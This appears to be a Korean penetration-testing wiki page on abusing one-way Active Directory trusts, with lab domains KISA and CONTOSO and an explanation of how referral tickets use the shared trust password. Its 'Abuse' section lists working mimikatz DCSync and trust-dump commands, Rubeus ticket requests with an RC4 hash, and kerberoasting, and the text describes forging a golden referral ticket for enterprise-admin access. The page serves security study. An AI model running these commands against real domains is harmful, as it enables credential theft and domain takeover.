search

Trust Account TGT

A 도메인은 B 도메인을 신뢰하지만 B 도메인은 A 도메인을 신뢰하지 않는 일방향적 신뢰 관계에서는 B 도메인만이 A 도메인에 인증하거나 리소스에 접근하는 것이 허용됩니다.

신뢰가 구성되면 신뢰받는 도메인에는 신뢰하는 도메인의 NetBIOS 이름으로 된 신뢰 계정이 생성되며, 이 계정의 패스워드는 두 도메인이 공유하는 신뢰 패스워드가 됩니다.

따라서 신뢰하는 도메인을 장악하여 신뢰 패스워드를 덤프한다면, 신뢰받는 도메인에 저장된 신뢰 계정의 자격 증명을 이용한 티켓을 발급하여 리소스에 접근할 수 있습니다.

hashtag
Abuse

# TDO GUID 열거
Get-ADObject -Filter 'objectClass -eq "trustedDomain"'

# 신뢰 패스워드 덤프
.\mimikatz.exe "lsadump::dcsync /guid:{f2599de1-3401-41dc-967a-80f50343cf1e} /domain:PENTEST.LOCAL" "exit"

# 트러스트 도메인 SID 열거
.\mimikatz.exe "lsadump::trust" "exit"

# 티켓 생성
.\Rubeus.exe asktgt /user:pentest$ /domain:contoso.com /rc4:ae8ac45464d823b0549450e3e803151f /nowrap /ptt

# 커버로스팅 등의 도메인 공격
.\Rubeus.exe kerberoast /domain:contoso.com

hashtag
Root Cause

신뢰 관계가 구성되면 신뢰 패스워드가 생성되어 TDO(Trusted Domain Object)의 trustAuthIncoming(인바운드), trustAuthOutcoming(아웃바운드) 속성에 저장되며, 이 값은 신뢰받는 도메인에 생성되는 신뢰 계정의 패스워드로 사용됩니다.

클라이언트가 외부 도메인 서비스에 접근하여 TGS-REQ를 서버에 전송하면, 서버는 서비스 티켓을 암호화 하기 위한 외부 도메인 서비스 계정의 패스워드 해시를 알지 못합니다. 따라서 외부 도메인과 서로 인증 정보를 교환하기 위한 공통 키가 필요하게 되어 신뢰 패스워드를 사용합니다.

https://adsecurity.org/?p=1588arrow-up-right

신뢰받는 도메인의 객체가 신뢰하는 도메인 리소스에 접근하려 할 때 언급한 것과 같이 일반적인 커버로스 인증 6단계처럼 TGT를 로컬 도메인 krbtgt 비밀 키로 암호화한다면 외부 도메인에서 이를 복호화할 수 없기 때문에 신뢰 패스워드를 통해 암호화 하는 2단계가 추가됩니다.

실습 환경에서는 KISA와 CONTOSO가 일방향 포레스트 트러스트 관계입니다. 실질적으로 CONTOSO 도메인 객체만이 KISA에 접근할 수 있기 때문에 KISA로부터 생성된 레퍼럴 티켓이 CONTOSO로 전달될 일은 없지만, 설계상 허점으로 인해 KISA에서 생성한 위조된 레퍼럴 티켓이 CONTOSO에서 수용됩니다.

일방향 포레스트 트러스트

공격자는 KISA.LOCAL을 장악한 이후 신뢰 패스워드를 통해 SID History를 CONTOSO.COM의 엔터프라이즈 관리자로 위조한 레퍼럴 골든 티켓을 생성한 이후 CONTOSO의 관리자 권한을 가질 수 있습니다.

hashtag
References

LogoDomain Trusts: An Exploitation PlaybookRedfox Security - Pen Testing Serviceschevron-right
PreviousDomain Lateral movementNextTwo way Trust

Last updated